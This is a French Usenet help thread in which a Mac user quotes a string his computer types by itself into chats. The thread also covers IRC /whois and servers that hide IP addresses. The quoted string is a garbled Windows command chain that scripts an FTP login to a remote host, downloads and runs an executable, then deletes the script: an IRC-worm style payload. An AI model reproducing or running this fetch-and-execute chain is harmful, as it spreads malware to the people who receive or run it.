Un Virus ?

92 réponses
RiGuad
Je m'en remet aux avis autorisés n'y comprenant plus rien a une
situation que je vis depuis 2 semaines :

Dans n'importe quelle situation, a n'importe quel moment , y compris
quand mon Imac (Sous OS a jour Tiger) est parfaitement inactif, il
"écrit " tout seul les "choses" suivantes :

(syste,root(`syste,ӎ`c,d:exe
c,d =c echo open ftp:hyper,qrt:net é& :: ik èecho user joh joh :: ik
èecho binqry :: ik èecho get qbc:exe :: ik èecho bye :: ik èftp )n )v
)smik èdel ik èqbc:exe èexit

Apres cela, mon clavier est incohérent a la frappe, je suis obligé de le
debrancher de son port usb, et de le rebrancher.
Là il refonctionne correctement, jusqu'a la fois suivante ou le Mac
"prend la main" sur tout ce que je peux faire , y compris debrancher le
clavier pendant, je dis bien pendant qu'il ecrit la suite de caracteres
ci dessus indiquée.

Un reboot ne change rien, ni reparation des autorisation, ni extinction
redémarrage.

Le plus insupportable est lorsque l'on tchatte avec un ami, ou cette
ligne incontrolable se tape toute seule , et ... se termine par un
Return ! L'ami recoie ca en plleine figure, et je dois debrancher
rebrancher mon clavier pour m'excuser.

Qu faire pour arreter ceci ? je ne vais quand meme pas reinstaller mon
Tiger ! ?

Merci a tous.

10 réponses

patpro ~ patrick proniewski
In article ,
Nina Popravka wrote:

On Mon, 05 Mar 2007 22:04:23 +0100, patpro ~ patrick proniewski
wrote:

et /whois avec ton login ? :)
(c'est quoi ces serveurs IRC qui masquent l'IP ??)

Heu... à ton âge tu nous démarres une carrière de hAckErz , ou quoi
??????????????????

ben franchement, je fréquente qu'IRCnet, et donc j'ai toujours eu les IP
visibles.

patpro

--
http://www.patpro.net/

RiGuad

et /whois avec ton login ? :)

ben ca donne ca :

Macounet is (Mozilla/4.0 (Compatible; MSIE 7.0;
Windows NT 5.1;)
on channels: #!domtom! on irc via server chat1.x-echo.com (Serveur
t'Chat) has identified for this nick

(c'est quoi ces serveurs IRC qui masquent l'IP ??)

Ce sont les serveur IRC de Orange irc.voila.fr accessible là par
le webchat:

http://www.orange.fr/bin/frame.cgi?u=http%3A//tchat.orange.fr/v4authClientLourd1.php

laurent.pertois
Henri Balmain wrote:

Autant que je sache, NetBarrier n'est qu'une interface de daemons Unix
préxistants

Non, pas que, sjmsb.

--
Politically Correct Unix - UTILITIES
The "touch" command has been removed from the standard distribution due
to its inappropriate use by high-level managers.

RiGuad
RiGuad wrote:

Ben ici ou dans les transactions pas mail , il suffit de lire les
entetes, mais dans un dialogue IRC, ya pas d'entete...Tu as le fenetre
de dialogue a la msn, mais dans laquelle tu peux taper des comandes
precedées de "/" alors a moins d'une commande que je ne connait pas , je
ne vois pas , sachant que les userhost des Pseudos sont souvent codés...

Je ne suis pas spécialiste d'IRC mais :
/whois pseudo_du_gars
ça le fait non ?

Ben en principe oui , mais je crois en fait que ce sont les serveurs de
Wanadoo Orange qui masquent l'IP et mettent autre chose a la place.
(accessible ici : )
http://www.orange.fr/bin/frame.cgi?u=http%3A//tchat.orange.fr/v4authClientLourd1.php

d'ou ma question, "comment le mecapc a t'il procédé ? "

Nina Popravka
On Mon, 05 Mar 2007 22:39:51 +0100, patpro ~ patrick proniewski
wrote:

ben franchement, je fréquente qu'IRCnet, et donc j'ai toujours eu les IP
visibles.

Je cauchemarde...
Je pensais être entourée de barbus, je me retrouve au milieu de
suppôts de MSN.
--
Nina

Nina Popravka
On Mon, 05 Mar 2007 18:03:03 -0400, RiGuad
wrote:

d'ou ma question, "comment le mecapc a t'il procédé ? "

Chépa... Ta femme a cafté ?
--
Nina

RiGuad

et /whois avec ton login ? :)

ben ca donne ca :

Macounet is (Mozilla/4.0 (Compatible; MSIE 7.0;
Windows NT 5.1;)
on channels: #!domtom! on irc via server chat1.x-echo.com (Serveur
t'Chat) has identified for this nick

(c'est quoi ces serveurs IRC qui masquent l'IP ??)

Ce sont les serveur IRC de Orange irc.voila.fr accessible là par
le webchat:

http://www.orange.fr/bin/frame.cgi?u=http%3A//tchat.orange.fr/v4authClientLourd1.php

Ou plutot non... l'adresse ci dessus c'est pour les mIRC et autres Snak...

Les Lambdas y accedent ici par le webtchat:
http://www.orange.fr/bin/frame.cgi?u=http://tchat.orange.fr

RiGuad
On Mon, 05 Mar 2007 18:03:03 -0400, RiGuad
wrote:

d'ou ma question, "comment le mecapc a t'il procédé ? "

Chépa... Ta femme a cafté ?

lol... encore eut il fallut que j'en eusse une (Sassdissa ?)

Nina Popravka
On Mon, 05 Mar 2007 18:10:23 -0400, RiGuad
wrote:

lol... encore eut il fallut que j'en eusse une (Sassdissa ?)

Ok... d'où l'explication d'IRC.
T'as Meetic, aussi... le panel est plus large.
--
Nina

Nina Popravka
On Mon, 05 Mar 2007 23:17:18 +0100, Erwan David
wrote:

Ben on trouve pas mal de barbus sur IRCNet. Nettement plsu que sur
MSN...

Je sais... Mais fonctionnellement je ne supporte ni l'un ni l'autre.
Le "je te vois mais tu me réponds pas" , je peux pas.
--
Nina